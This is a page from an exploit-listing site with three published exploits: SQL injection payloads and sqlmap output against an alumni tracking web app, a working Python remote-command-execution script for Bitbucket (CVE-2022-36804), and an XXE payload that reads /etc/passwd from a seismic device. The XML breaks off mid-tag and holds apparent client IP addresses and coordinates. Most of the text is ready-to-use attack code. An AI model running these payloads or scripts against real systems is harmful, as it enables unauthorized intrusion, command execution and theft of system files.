Latest exploits :: CodePwn

<pre><code># Exploit Title: Online Graduate Tracer System - Multiple SQLi # Date: 24/03/2023 # Exploit Author: Abdulhakim Öner # Vendor Homepage: https://www.sourcecodester.com # Software Link: https://www.sourcecodester.com/php/15904/online-graduate-tracer-system-college-ict-alumni.html # Software Download: https://www.sourcecodester.com/sites/default/files/download/oretnom23/tracking.zip # Version: 1.0 # Tested on: Windows, Linux ## Description A Blind SQL injection vulnerability in the fill-in forms of Online Graduate Tracer System allows remote unauthenticated attackers to execute remote arbitrary SQL commands through "age" parameter. ## Request PoC ``` POST /tracking/ HTTP/1.1 Host: 192.168.1.100 Accept-Encoding: gzip, deflate Accept: */* Accept-Language: en-US;q=0.9,en;q=0.8 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.102 Safari/537.36 Connection: close Cache-Control: max-age=0 Referer: http://192.168.1.100/tracking/ Content-Type: application/x-www-form-urlencoded Content-Length: 666 fullname=TKeljbcD&age=24'&sex=&dob=11%2f11%2f1992&cs=&religion=&street=518287&barangay=933877&municipal=149726&province=293419&region=&zipcode=21788&country=767093&course=&batch=&facebook=329348&twitter=488487&phonenumber=197-436-9799&email=dKYxqIen@burpcollaborator.net&estatus=Employed&organization=&profession=503409&type=Working+Fulltime&location=local&location=abroad&status=Permanent&status=Contractual&status=Casual&status=Others&number=1-5+yrs&income=359935&relate=Yes&sreason=621051&nature=792251&company=597673&num=0-5+yrs&num=6-10+yrs&num=10-15+yrs&num=16+yrs+above&mincome=325978&reason=992014&consider=Yes&submit= ``` This request causes a Fatal error. Adding "'%2b(select*from(select(sleep(10)))a)%2b'" to the end of "age" parameter, the response to request was 200 status code with message of OK, but 20 seconds later, which indicates that our sleep 10 command works. ``` POST /tracking/ HTTP/1.1 Host: 192.168.1.100 Accept-Encoding: gzip, deflate Accept: */* Accept-Language: en-US;q=0.9,en;q=0.8 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.102 Safari/537.36 Connection: close Cache-Control: max-age=0 Referer: http://192.168.1.100/tracking/ Content-Type: application/x-www-form-urlencoded Content-Length: 666 fullname=TKeljbcD&age=24'%2b(select*from(select(sleep(10)))a)%2b'&sex=&dob=11%2f11%2f1992&cs=&religion=&street=518287&barangay=933877&municipal=149726&province=293419&region=&zipcode=21788&country=767093&course=&batch=&facebook=329348&twitter=488487&phonenumber=197-436-9799&email=dKYxqIen@burpcollaborator.net&estatus=Employed&organization=&profession=503409&type=Working+Fulltime&location=local&location=abroad&status=Permanent&status=Contractual&status=Casual&status=Others&number=1-5+yrs&income=359935&relate=Yes&sreason=621051&nature=792251&company=597673&num=0-5+yrs&num=6-10+yrs&num=10-15+yrs&num=16+yrs+above&mincome=325978&reason=992014&consider=Yes&submit= ``` ## Exploit with sqlmap Save the request from burp to file ``` ┌──(root㉿caesar)-[/home/kali/Workstation/sts] └─# sqlmap -r sqli.txt -p 'age' --batch --dbs --level=3 --risk=2 ---snip--- [01:53:49] [INFO] testing 'MySQL UNION query (random number) - 81 to 100 columns' POST parameter 'age' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N sqlmap identified the following injection point(s) with a total of 630 HTTP(s) requests: --- Parameter: age (POST) Type: boolean-based blind Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: fullname=TKeljbcD&age=24' RLIKE (SELECT (CASE WHEN (6534=6534) THEN 24 ELSE 0x28 END)) AND 'ATRa'='ATRa&sex=&dob=11/11/1992&cs=&religion=&street=518287&barangay=933877&municipal=149726&province=293419&region=&zipcode=21788&country=767093&course=&batch=&facebook=329348&twitter=488487&phonenumber=197-436-9799&email=dKYxqIen@burpcollaborator.net&estatus=Employed&organization=&profession=503409&type=Working Fulltime&location=local&location=abroad&status=Permanent&status=Contractual&status=Casual&status=Others&number=1-5 yrs&income=359935&relate=Yes&sreason=621051&nature=792251&company=597673&num=0-5 yrs&num=6-10 yrs&num=10-15 yrs&num=16 yrs above&mincome=325978&reason=992014&consider=Yes&submit= Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) Payload: fullname=TKeljbcD&age=24' AND (SELECT 9933 FROM(SELECT COUNT(*),CONCAT(0x7170716271,(SELECT (ELT(9933=9933,1))),0x7178767a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'PwMK'='PwMK&sex=&dob=11/11/1992&cs=&religion=&street=518287&barangay=933877&municipal=149726&province=293419&region=&zipcode=21788&country=767093&course=&batch=&facebook=329348&twitter=488487&phonenumber=197-436-9799&email=dKYxqIen@burpcollaborator.net&estatus=Employed&organization=&profession=503409&type=Working Fulltime&location=local&location=abroad&status=Permanent&status=Contractual&status=Casual&status=Others&number=1-5 yrs&income=359935&relate=Yes&sreason=621051&nature=792251&company=597673&num=0-5 yrs&num=6-10 yrs&num=10-15 yrs&num=16 yrs above&mincome=325978&reason=992014&consider=Yes&submit= Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: fullname=TKeljbcD&age=24' AND (SELECT 7274 FROM (SELECT(SLEEP(5)))gxIn) AND 'maqj'='maqj&sex=&dob=11/11/1992&cs=&religion=&street=518287&barangay=933877&municipal=149726&province=293419&region=&zipcode=21788&country=767093&course=&batch=&facebook=329348&twitter=488487&phonenumber=197-436-9799&email=dKYxqIen@burpcollaborator.net&estatus=Employed&organization=&profession=503409&type=Working Fulltime&location=local&location=abroad&status=Permanent&status=Contractual&status=Casual&status=Others&number=1-5 yrs&income=359935&relate=Yes&sreason=621051&nature=792251&company=597673&num=0-5 yrs&num=6-10 yrs&num=10-15 yrs&num=16 yrs above&mincome=325978&reason=992014&consider=Yes&submit= --- [01:53:50] [INFO] the back-end DBMS is MySQL web application technology: PHP 8.2.0, Apache 2.4.54 back-end DBMS: MySQL >= 5.0 (MariaDB fork) ---snip--- ``` ## The "barangay", "batch", "company", "country", "course", "cs", "dob", "email", "estatus", "facebook", "fullname", "income", "location", "mincome", "municipal", "nature", "number", "organization", "phonenumber", "profession", "province", "region", "relate", "religion", "sex", "sreason", "status", "street", "twitter", "type" and "zipcode" parameters in the POST requests are also vulnerable. They can be exploited in the same way. </code></pre>

<pre><code># Exploit Title: Bitbucket v7.0.0 - RCE # Date: 09-23-2022 # Exploit Author: khal4n1 # Vendor Homepage: https://github.com/khal4n1 # Tested on: Kali and ubuntu LTS 22.04 # CVE : cve-2022-36804 #****************************************************************# #The following exploit is used to exploit a vulnerability present #Atlassian Bitbucket Server and Data Center 7.0.0 before version #7.6.17, from version 7.7.0 before version 7.17.10, from version #7.18.0 before version 7.21.4, from version 8.0.0 before version #8.0.3, from version 8.1.0 before version 8.1.3, and from version #8.2.0 before version 8.2.2, and from version 8.3.0 before 8.3.1 #Usage Example # python3 mexploit.py --url http://127.0.0.1:7990 --cmd 'cat /etc/passwd' # python3 mexploit.py --url http://127.0.0.1:7990 --cmd 'id' #The server will send a 500 http response with the stout output from the # command executed. #****************************************************************# #!/usr/bin/python3 import argparse import urllib from urllib import request import re #argument setup parser = argparse.ArgumentParser(description='Program to test bitbucket vulnerability CVE-2022-36804') parser.add_argument("--url", help="Set the target to attack. [REQUIRED]", required=True ) parser.add_argument("--cmd", help="Set the command to execute. [DEFAULT ID]", required=True, default='id') args = parser.parse_args() cmd= urllib.parse.quote(args.cmd) #reads from the public repository what is available requ = request.urlopen(args.url+ "/repos?visibility=public") response = requ.read() #select a public project and stores it in a variable project = re.findall('7990/projects/(.*)/repos/', str(re.findall('7990/projects/(.*)/repos/', str(response))[-1]))[-1] #Selects a public repo and stores it in a vatiable file = re.findall('/repos/(.*)/browse', str(re.findall('7990/projects/(.*)/repos/', str(response))[-1]))[0] # Exploitation try : attack = request.urlopen(args.url + "/rest/api/latest/projects/" + project + "/repos/" + file + "/archive?prefix=ax%00--exec=%60"+cmd+"%60%00--remote=origin") print (attack.response()) except urllib.error.HTTPError as e: body = e.read().decode() # Read the body of the error response print (body) </code></pre>

<pre><code># Exploit Title: MAN-EAM-0003 V3.2.4 - XXE # Date: 2022-09-19 # Exploit Author: Ahmed Alroky # Author: http://guralp.com/ # Version: 3.2.4 # Authentication Required: NO # CVE : CVE-2022-38840 # Google dork: " webconfig menu.cgi " # Tested on: Windows # Exploit 1 - browse to http://<Host<http://%3cHost> name>/cgi-bin/xmlstatus.cgi 2 - click on "View saved XML snapshot" and upload XML exploit file or paste the exploit code and submit the form 3 - you will get /etc/passwd file content #XML exploit code ``` <?xml version='1.0'?> <!DOCTYPE replace [<!ENTITY example SYSTEM "file:///etc/passwd"> ]> <xml-status xmlns='http://www.guralp.com/platinum/xmlns/xmlstatus/1.1'> <module status='-1' display-primary='true' path='das' title='Data acquisition'> <reading status='100' display-primary='false' path='is_faulty' title='Fault condition'>false</reading> <reading status='-1' display-primary='false' path='dsp_tag' title='DSP code tag'>platinum</reading> <reading status='-1' display-primary='false' path='dsp_version' title='DSP code version'>102</reading> <reading status='100' display-primary='true' path='dsp_state' title='Acquisition hardware module'>running</reading> <reading status='-1' display-primary='true' path='reference_clock' title='Reference clock type'>GPS</reading> <reading status='100' display-primary='false' path='clock_controller' title='ADC clock controller state'>FLL</reading> <reading status='-1' display-primary='false' path='clock_control_val' title='ADC clock controller value'>46196</reading> <reading status='100' display-primary='true' path='clock_locked' title='ADC clock locked'>true</reading> <reading status='-1' display-primary='true' path='clock_last_locked' title='ADC clock last locked at'>2022-06-14T11:26:53Z</reading> <reading status='100' display-primary='true' path='clock_phase_error' units='s' title='ADC clock phase error'>6.1e-08</reading> </module> <module status='-1' display-primary='true' path='das-in.sensor.DONB..TM.0' title='Sensor A'> <reading status='100' display-primary='true' path='state' title='Current state'>running</reading> <reading status='-1' display-primary='true' path='last_action_time' title='Last action timestamp'>never</reading> <reading status='-1' display-primary='true' path='last_action' title='Last action'></reading> <reading status='96' display-primary='true' path='mass_Z' title='Z mass position'>4.6%</reading> <reading status='100' display-primary='true' path='mass_N' title='N mass position'>-0.3%</reading> <reading status='100' display-primary='true' path='mass_E' title='E mass position'>-0.3%</reading> </module> <module status='-1' display-primary='true' path='das-in.sensor.DONB..TM.1' title='Sensor B'> <reading status='100' display-primary='true' path='state' title='Current state'>running</reading> <reading status='-1' display-primary='true' path='last_action_time' title='Last action timestamp'>never</reading> <reading status='-1' display-primary='true' path='last_action' title='Last action'></reading> </module> <module status='-1' display-primary='true' path='das-in.sensor.DONB..TM.X' title='Auxiliary'> <reading status='100' display-primary='true' path='state' title='Current state'>running</reading> <reading status='-1' display-primary='true' path='last_action_time' title='Last action timestamp'>never</reading> <reading status='-1' display-primary='true' path='last_action' title='Last action'></reading> </module> <module status='-1' display-primary='true' path='gcf-out-scream.default' title='Scream server (GCF network sender)'> <reading status='100' display-primary='true' path='total_blocks' title='Total number of blocks sent'>11374055</reading> <reading status='100' display-primary='true' path='last5_blocks' title='Number of blocks sent in last 5 minutes'>331</reading> <reading status='-1' display-primary='false' path='port_number' title='Port listening on'>1567</reading> <reading status='-1' display-primary='true' path='num_clients' title='Number of clients connected'>0</reading> <list status='-1' display-primary='true' path='clients' title='Clients'> </list> </module> <module status='-1' display-primary='false' path='gdi-base.default' title='Default data transport daemon'> <reading status='100' display-primary='true' path='num_channels' title='Number of channels'>16</reading> <reading status='100' display-primary='true' path='num_clients' title='Number of connected clients'>5</reading> <reading status='100' display-primary='true' path='num_samples' title='Number of samples received'>7338920142</reading> <reading status='100' display-primary='true' path='last5_samples' title='Number of samples in last 5 minutes'>213600</reading> <list status='-1' display-primary='false' path='clients' title='Clients'> <list-item status='-1' display-primary='false' path='44B02216' title='Client #1'> <reading status='-1' display-primary='false' path='name' title='Client name'>gdi2gcf[default]</reading> </list-item> <list-item status='-1' display-primary='false' path='1CC104A5' title='Client #2'> <reading status='-1' display-primary='false' path='name' title='Client name'>gdi-link-tx[default]</reading> </list-item> <list-item status='-1' display-primary='false' path='9D9E4553' title='Client #3'> <reading status='-1' display-primary='false' path='name' title='Client name'>gdi2miniseed[default]</reading> </list-item> <list-item status='-1' display-primary='false' path='4B1427EC' title='Client #4'> <reading status='-1' display-primary='false' path='name' title='Client name'>das-in</reading> </list-item> <list-item status='-1' display-primary='false' path='412FD3EB' title='Client #5'> <reading status='-1' display-primary='false' path='name' title='Client name'>das-in-textstatus</reading> </list-item> </list> <list status='-1' display-primary='false' path='channels' title='Channels'> <list-item status='-1' display-primary='false' path='38B5E770' title='Channel #1'> <reading status='-1' display-primary='false' path='name' title='Channel name'>DONB.HHZ.TM.00</reading> </list-item> <list-item status='-1' display-primary='false' path='7B77F21B' title='Channel #2'> <reading status='-1' display-primary='false' path='name' title='Channel name'>DONB.HHN.TM.00</reading> </list-item> <list-item status='-1' display-primary='false' path='B55019F4' title='Channel #3'> <reading status='-1' display-primary='false' path='name' title='Channel name'>DONB.HHE.TM.00</reading> </list-item> <list-item status='-1' display-primary='false' path='35ED217B' title='Channel #4'> <reading status='-1' display-primary='false' path='name' title='Channel name'>DONB.HDF.TM.X0</reading> </list-item> <list-item status='-1' display-primary='false' path='8062D6AB' title='Channel #5'> <reading status='-1' display-primary='false' path='name' title='Channel name'>DONB.HNZ.TM.10</reading> </list-item> <list-item status='-1' display-primary='false' path='2099C9F1' title='Channel #6'> <reading status='-1' display-primary='false' path='name' title='Channel name'>DONB.HNN.TM.10</reading> </list-item> <list-item status='-1' display-primary='false' path='DE833721' title='Channel #7'> <reading status='-1' display-primary='false' path='name' title='Channel name'>DONB.HNE.TM.10</reading> </list-item> <list-item status='-1' display-primary='false' path='5510ED44' title='Channel #8'> <reading status='-1' display-primary='false' path='name' title='Channel name'>DONB.MMZ.TM.00</reading> </list-item> <list-item status='-1' display-primary='false' path='ACFA260E' title='Channel #9'> <reading status='-1' display-primary='false' path='name' title='Channel name'>DONB.MMN.TM.00</reading> </list-item> <list-item status='-1' display-primary='false' path='5BED382E' title='Channel #10'> <reading status='-1' display-primary='false' path='name' title='Channel name'>DONB.MME.TM.00</reading> </list-item> <list-item status='-1' display-primary='false' path='67453FF7' title='Channel #11'> <reading status='-1' display-primary='false' path='name' title='Channel name'>DONB.SOH.TM.0</reading> </list-item> <list-item status='-1' display-primary='false' path='1D34DF0D' title='Channel #12'> <reading status='-1' display-primary='false' path='name' title='Channel name'>DONB-AIB</reading> </list-item> <list-item status='-1' display-primary='false' path='A11AEDBA' title='Channel #13'> <reading status='-1' display-primary='false' path='name' title='Channel name'>DONB.SOH.TM.1</reading> </list-item> <list-item status='-1' display-primary='false' path='2DBCFF6E' title='Channel #14'> <reading status='-1' display-primary='false' path='name' title='Channel name'>DONB-BIB</reading> </list-item> <list-item status='-1' display-primary='false' path='9D7CDB17' title='Channel #15'> <reading status='-1' display-primary='false' path='name' title='Channel name'>DONB.SOH.TM.X</reading> </list-item> <list-item status='-1' display-primary='false' path=' 8A3C070' title='Channel #16'> <reading status='-1' display-primary='false' path='name' title='Channel name'>DONB-XIB</reading> </list-item> </list> </module> <module status='-1' display-primary='true' path='gdi-link-tx.default' title='System gdi-link transmitter'> <reading status='100' display-primary='true' path='total_bytes_sent' units='bytes' title='Total number of bytes sent'>11273973132</reading> <reading status='100' display-primary='true' path='last5_bytes_sent' title='Number of bytes sent in last 5 minutes'>325518</reading> <reading status='100' display-primary='true' path='tx_rate' title='Transmit rate over last 5 minutes'>1085.06</reading> <reading status='-1' display-primary='false' path='port_number' title='Port listening on'>1565</reading> <reading status='100' display-primary='true' path='num_clients' title='Number of clients'>0</reading> <list status='-1' display-primary='true' path='clients' title='Clients'> </list> </module> <module status='-1' display-primary='true' path='gdi2gcf.default' title='GCF compressor. Default instance'> <reading status='100' display-primary='true' path='num_samples_in' title='Total number of samples in'>7439096490</reading> <reading status='100' display-primary='true' path='last5_samples_in' title='Number of samples in in last 5 minutes'>216516</reading> <reading status='100' display-primary='true' path='num_blocks_out' title='Total number of blocks out'>11374055</reading> <reading status='100' display-primary='true' path='last5_blocks_out' title='Number of blocks out in last 5 minutes'>331</reading> <list status='-1' display-primary='false' path='channels' title='Channels'> <list-item status='-1' display-primary='true' path='10D33176' title='DONB.HHZ.TM.00'> <reading status='-1' display-primary='true' path='sample_rate' units='Hz' title='Sample rate'>100</reading> <reading status='-1' display-primary='true' path='gcf_name' title='GCF name'>DONB-AZ0</reading> <reading status='-1' display-primary='true' path='last_block' title='Last block timestamp'>2022-06-14T11:26:46.000000000Z</reading> <reading status='-1' display-primary='false' path='digitiser_type' title='GCF digitiser type'>CMG-DAS</reading> <reading status='-1' display-primary='false' path='ttl' title='GCF tap table lookup'>0</reading> <reading status='-1' display-primary='false' path='pga' title='GCF variable gain'>1</reading> </list-item> <list-item status='-1' display-primary='true' path='39355EAD' title='DONB.HHN.TM.00'> <reading status='-1' display-primary='true' path='sample_rate' units='Hz' title='Sample rate'>100</reading> <reading status='-1' display-primary='true' path='gcf_name' title='GCF name'>DONB-AN0</reading> <reading status='-1' display-primary='true' path='last_block' title='Last block timestamp'>2022-06-14T11:26:46.000000000Z</reading> <reading status='-1' display-primary='false' path='digitiser_type' title='GCF digitiser type'>CMG-DAS</reading> <reading status='-1' display-primary='false' path='ttl' title='GCF tap table lookup'>0</reading> <reading status='-1' display-primary='false' path='pga' title='GCF variable gain'>1</reading> </list-item> <list-item status='-1' display-primary='true' path=' 380425E' title='DONB.HHE.TM.00'> <reading status='-1' display-primary='true' path='sample_rate' units='Hz' title='Sample rate'>100</reading> <reading status='-1' display-primary='true' path='gcf_name' title='GCF name'>DONB-AE0</reading> <reading status='-1' display-primary='true' path='last_block' title='Last block timestamp'>2022-06-14T11:26:45.000000000Z</reading> <reading status='-1' display-primary='false' path='digitiser_type' title='GCF digitiser type'>CMG-DAS</reading> <reading status='-1' display-primary='false' path='ttl' title='GCF tap table lookup'>0</reading> <reading status='-1' display-primary='false' path='pga' title='GCF variable gain'>1</reading> </list-item> <list-item status='-1' display-primary='true' path='E6EAF8A3' title='DONB.HDF.TM.X0'> <reading status='-1' display-primary='true' path='sample_rate' units='Hz' title='Sample rate'>100</reading> <reading status='-1' display-primary='true' path='gcf_name' title='GCF name'>DONB-XX0</reading> <reading status='-1' display-primary='true' path='last_block' title='Last block timestamp'>2022-06-14T11:26:35.000000000Z</reading> <reading status='-1' display-primary='false' path='digitiser_type' title='GCF digitiser type'>CMG-DAS</reading> <reading status='-1' display-primary='false' path='ttl' title='GCF tap table lookup'>0</reading> <reading status='-1' display-primary='false' path='pga' title='GCF variable gain'>1</reading> </list-item> <list-item status='-1' display-primary='true' path='45B1141C' title='DONB.HNZ.TM.10'> <reading status='-1' display-primary='true' path='sample_rate' units='Hz' title='Sample rate'>100</reading> <reading status='-1' display-primary='true' path='gcf_name' title='GCF name'>DONB-BZ0</reading> <reading status='-1' display-primary='true' path='last_block' title='Last block timestamp'>2022-06-14T11:26:48.000000000Z</reading> <reading status='-1' display-primary='false' path='digitiser_type' title='GCF digitiser type'>CMG-DAS</reading> <reading status='-1' display-primary='false' path='ttl' title='GCF tap table lookup'>0</reading> <reading status='-1' display-primary='false' path='pga' title='GCF variable gain'>1</reading> </list-item> <list-item status='-1' display-primary='true' path=' 9951403' title='DONB.HNN.TM.10'> <reading status='-1' display-primary='true' path='sample_rate' units='Hz' title='Sample rate'>100</reading> <reading status='-1' display-primary='true' path='gcf_name' title='GCF name'>DONB-BN0</reading> <reading status='-1' display-primary='true' path='last_block' title='Last block timestamp'>2022-06-14T11:26:42.000000000Z</reading> <reading status='-1' display-primary='false' path='digitiser_type' title='GCF digitiser type'>CMG-DAS</reading> <reading status='-1' display-primary='false' path='ttl' title='GCF tap table lookup'>0</reading> <reading status='-1' display-primary='false' path='pga' title='GCF variable gain'>1</reading> </list-item> <list-item status='-1' display-primary='true' path='3B38B4CE' title='DONB.HNE.TM.10'> <reading status='-1' display-primary='true' path='sample_rate' units='Hz' title='Sample rate'>100</reading> <reading status='-1' display-primary='true' path='gcf_name' title='GCF name'>DONB-BE0</reading> <reading status='-1' display-primary='true' path='last_block' title='Last block timestamp'>2022-06-14T11:26:40.000000000Z</reading> <reading status='-1' display-primary='false' path='digitiser_type' title='GCF digitiser type'>CMG-DAS</reading> <reading status='-1' display-primary='false' path='ttl' title='GCF tap table lookup'>0</reading> <reading status='-1' display-primary='false' path='pga' title='GCF variable gain'>1</reading> </list-item> <list-item status='-1' display-primary='true' path='3E12CA7F' title='DONB.MMZ.TM.00'> <reading status='-1' display-primary='true' path='sample_rate' units='Hz' title='Sample rate'>4</reading> <reading status='-1' display-primary='true' path='gcf_name' title='GCF name'>DONB-AM8</reading> <reading status='-1' display-primary='true' path='last_block' title='Last block timestamp'>2022-06-14T11:24:48.000000000Z</reading> <reading status='-1' display-primary='false' path='digitiser_type' title='GCF digitiser type'>CMG-DAS</reading> <reading status='-1' display-primary='false' path='ttl' title='GCF tap table lookup'>0</reading> <reading status='-1' display-primary='false' path='pga' title='GCF variable gain'></reading> </list-item> <list-item status='-1' display-primary='true' path='F194038D' title='DONB.MMN.TM.00'> <reading status='-1' display-primary='true' path='sample_rate' units='Hz' title='Sample rate'>4</reading> <reading status='-1' display-primary='true' path='gcf_name' title='GCF name'>DONB-AM9</reading> <reading status='-1' display-primary='true' path='last_block' title='Last block timestamp'>2022-06-14T11:23:47.000000000Z</reading> <reading status='-1' display-primary='false' path='digitiser_type' title='GCF digitiser type'>CMG-DAS</reading> <reading status='-1' display-primary='false' path='ttl' title='GCF tap table lookup'>0</reading> <reading status='-1' display-primary='false' path='pga' title='GCF variable gain'></reading> </list-item> <list-item status='-1' display-primary='true' path='80F951F3' title='DONB.MME.TM.00'> <reading status='-1' display-primary='true' path='sample_rate' units='Hz' title='Sample rate'>4</reading> <reading status='-1' display-primary='true' path='gcf_name' title='GCF name'>DONB-AMA</reading> <reading status='-1' display-primary='true' path='last_block' title='Last block timestamp'>2022-06-14T11:23:57.000000000Z</reading> <reading status='-1' display-primary='false' path='digitiser_type' title='GCF digitiser type'>CMG-DAS</reading> <reading status='-1' display-primary='false' path='ttl' title='GCF tap table lookup'>0</reading> <reading status='-1' display-primary='false' path='pga' title='GCF variable gain'></reading> </list-item> <list-item status='-1' display-primary='true' path=' DCFFBA' title='DONB.SOH.TM.0'> <reading status='-1' display-primary='true' path='sample_rate' units='Hz' title='Sample rate'>nan</reading> <reading status='-1' display-primary='true' path='gcf_name' title='GCF name'>DONB-A00</reading> <reading status='-1' display-primary='true' path='last_block' title='Last block timestamp'></reading> <reading status='-1' display-primary='false' path='digitiser_type' title='GCF digitiser type'>CMG-DAS</reading> <reading status='-1' display-primary='false' path='ttl' title='GCF tap table lookup'>0</reading> <reading status='-1' display-primary='false' path='pga' title='GCF variable gain'></reading> </list-item> <list-item status='-1' display-primary='true' path='F2D860DE' title='DONB-AIB'> <reading status='-1' display-primary='true' path='sample_rate' units='Hz' title='Sample rate'>nan</reading> <reading status='-1' display-primary='true' path='gcf_name' title='GCF name'>DONB-AIB</reading> <reading status='-1' display-primary='true' path='last_block' title='Last block timestamp'></reading> <reading status='-1' display-primary='false' path='digitiser_type' title='GCF digitiser type'>CMG-DAS</reading> <reading status='-1' display-primary='false' path='ttl' title='GCF tap table lookup'>0</reading> <reading status='-1' display-primary='false' path='pga' title='GCF variable gain'></reading> </list-item> <list-item status='-1' display-primary='true' path='8B4D513B' title='DONB.SOH.TM.1'> <reading status='-1' display-primary='true' path='sample_rate' units='Hz' title='Sample rate'>nan</reading> <reading status='-1' display-primary='true' path='gcf_name' title='GCF name'>DONB-B00</reading> <reading status='-1' display-primary='true' path='last_block' title='Last block timestamp'></reading> <reading status='-1' display-primary='false' path='digitiser_type' title='GCF digitiser type'>CMG-DAS</reading> <reading status='-1' display-primary='false' path='ttl' title='GCF tap table lookup'>0</reading> <reading status='-1' display-primary='false' path='pga' title='GCF variable gain'></reading> </list-item> <list-item status='-1' display-primary='true' path='5CC9B084' title='DONB-BIB'> <reading status='-1' display-primary='true' path='sample_rate' units='Hz' title='Sample rate'>nan</reading> <reading status='-1' display-primary='true' path='gcf_name' title='GCF name'>DONB-BIB</reading> <reading status='-1' display-primary='true' path='last_block' title='Last block timestamp'></reading> <reading status='-1' display-primary='false' path='digitiser_type' title='GCF digitiser type'>CMG-DAS</reading> <reading status='-1' display-primary='false' path='ttl' title='GCF tap table lookup'>0</reading> <reading status='-1' display-primary='false' path='pga' title='GCF variable gain'></reading> </list-item> <list-item status='-1' display-primary='true' path='B4418B8A' title='DONB.SOH.TM.X'> <reading status='-1' display-primary='true' path='sample_rate' units='Hz' title='Sample rate'>nan</reading> <reading status='-1' display-primary='true' path='gcf_name' title='GCF name'>DONB-X00</reading> <reading status='-1' display-primary='true' path='last_block' title='Last block timestamp'></reading> <reading status='-1' display-primary='false' path='digitiser_type' title='GCF digitiser type'>CMG-DAS</reading> <reading status='-1' display-primary='false' path='ttl' title='GCF tap table lookup'>0</reading> <reading status='-1' display-primary='false' path='pga' title='GCF variable gain'></reading> </list-item> <list-item status='-1' display-primary='true' path='AB7AFF68' title='DONB-XIB'> <reading status='-1' display-primary='true' path='sample_rate' units='Hz' title='Sample rate'>nan</reading> <reading status='-1' display-primary='true' path='gcf_name' title='GCF name'>DONB-XIB</reading> <reading status='-1' display-primary='true' path='last_block' title='Last block timestamp'></reading> <reading status='-1' display-primary='false' path='digitiser_type' title='GCF digitiser type'>CMG-DAS</reading> <reading status='-1' display-primary='false' path='ttl' title='GCF tap table lookup'>0</reading> <reading status='-1' display-primary='false' path='pga' title='GCF variable gain'></reading> </list-item> </list> </module> <module status='-1' display-primary='true' path='gdi2miniseed.default' title='Mini-SEED compressor. Default instance'> <reading status='100' display-primary='true' path='num_samples_in' title='Total number of data samples in'>6184483152</reading> <reading status='100' display-primary='true' path='last5_samples_in' title='Number of samples in last 5 minutes'>180000</reading> <reading status='100' display-primary='true' path='num_text_in' title='Total number of text samples in'>0</reading> <reading status='100' display-primary='true' path='last5_text_in' title='Number of text samples in last 5 minutes'>0</reading> <reading status='100' display-primary='true' path='num_ms_rec_out' title='Total number of Miniseed records out'>22682743</reading> <reading status='100' display-primary='true' path='last5_ms_rec_out' title='Number of Miniseed records out in last 5 minutes'>655</reading> </module> <module status='-1' display-primary='true' path='gps' title='GPS'> <reading status='100' display-primary='true' path='have_data' title='GPS data received'>true</reading> <reading status='100' display-primary='false' path='last_data' title='Last data received from GPS'>2022-06-14T11:26:53Z</reading> <reading status='100' display-primary='true' path='fix' title='Fix'>3D</reading> <reading status='100' display-primary='true' path='last_fix' title='Timestamp of last fix'>2022-06-14T11:26:53Z</reading> <reading status='-1' display-primary='true' path='latitude' units='Â°' title='Latitude'>13.909917</reading> <reading status='-1' display-primary='true' path='longitude' units='Â°' title='Longitude'>100.593734</reading> <reading status='-1' display-primary='true' path='elevation' units='m' title='Elevation'>3</reading> <reading status='100' display-primary='true' path='sv_count' title='Count of satellites in view'>26</reading> <reading status='100' display-primary='true' path='sv_used' title='Count of satellites used in fix'>12</reading> <reading status='-1' display-primary='true' path='sv_online' title='Timestamp of last nmea sentence'>2022-06-14T11:26:52Z</reading> <reading status='100' display-primary='true' path='rs232_detect' title='RS232 device detect'>true</reading> </module> <module status='-1' display-primary='true' path='ntp' title='NTP'> <reading status='-1' display-primary='false' path='mode' title='Timing mode'>direct_gps</reading> <reading status='-1' display-primary='true' path='mode_desc' title='Timing mode'>NTP is using a GPS reference source.</reading> <reading status='100' display-primary='true' path='locked' title='Clock locked'>true</reading> <reading status='100' display-primary='true' path='estimated_error' units='s' title='Estimated error'>0.000131</reading> <reading status='-1' display-primary='true' path='clock_source' title='Clock source'>GPS</reading> <reading status='-1' display-primary='false' path='peer' title='Peer'>127.127.28.1</reading> <reading status='-1' display-primary='false' path='peer_refid' title='Peer's reference ID'>GPS</reading> </module> <module status='-1' display-primary='true' path='seedlink-out.0' title='SEEDlink network server (instance 1)'> <reading status='-1' display-primary='true' path='num_records' title='Total number of records seen'>22682743</reading> <reading status='100' display-primary='true' path='last5_records' title='Number of records seen in last 5 minutes'>655</reading> <reading status='-1' display-primary='true' path='seq' title='Current sequence number'>3382931</reading> <reading status='100' display-primary='true' path='num_clients' title='Number of clients connected'>7</reading> <list status='-1' display-primary='true' path='clients' title='Clients'> <list-item status='-1' display-primary='true' path='2DF96A1C' title='Client #1700'> <reading status='-1' display-primary='true' path='remote_ip' title='Remote IP address'>123.160.221.22</reading> <reading status='-1' display-primary='true' path='remote_port' title='Remote TCP port'>21100</reading> <reading status='-1' display-primary='true' path='dialup' title='Dialup mode'>false</reading> <reading status='-1' display-primary='true' path='seqno' title='Last sequence no'>0</reading> </list-item> <list-item status='-1' display-primary='true' path='79C29121' title='Client #3412'> <reading status='-1' display-primary='true' path='remote_ip' title='Remote IP address'>113.53.234.98</reading> <reading status='-1' display-primary='true' path='remote_port' title='Remote TCP port'>33964</reading> <reading status='-1' display-primary='true' path='dialup' title='Dialup mode'>false</reading> <reading status='-1' display-primary='true' path='seqno' title='Last sequence no'>0</reading> </list-item> <list-item status='-1' display-primary='true' path='5060E6FF' title='Client #3581'> <reading status='-1' display-primary='true' path='remote_ip' title='Remote IP address'>203.114.125.67</reading> <reading status='-1' display-primary='true' path='remote_port' title='Remote TCP port'>48666</reading> <reading status='-1' display-primary='true' path='dialup' title='Dialup mode'>false</reading> <reading status='-1' display-primary='true' path='seqno' title='Last sequence no'>3221351</reading> </list-item> <list-item status='-1' display-primary='true' path='B1A1AB18' title='Client #3723'> <reading status='-1' display-primary='true' path='remote_ip' title='Remote IP address'>113.53.234.98</reading> <reading status='-1' 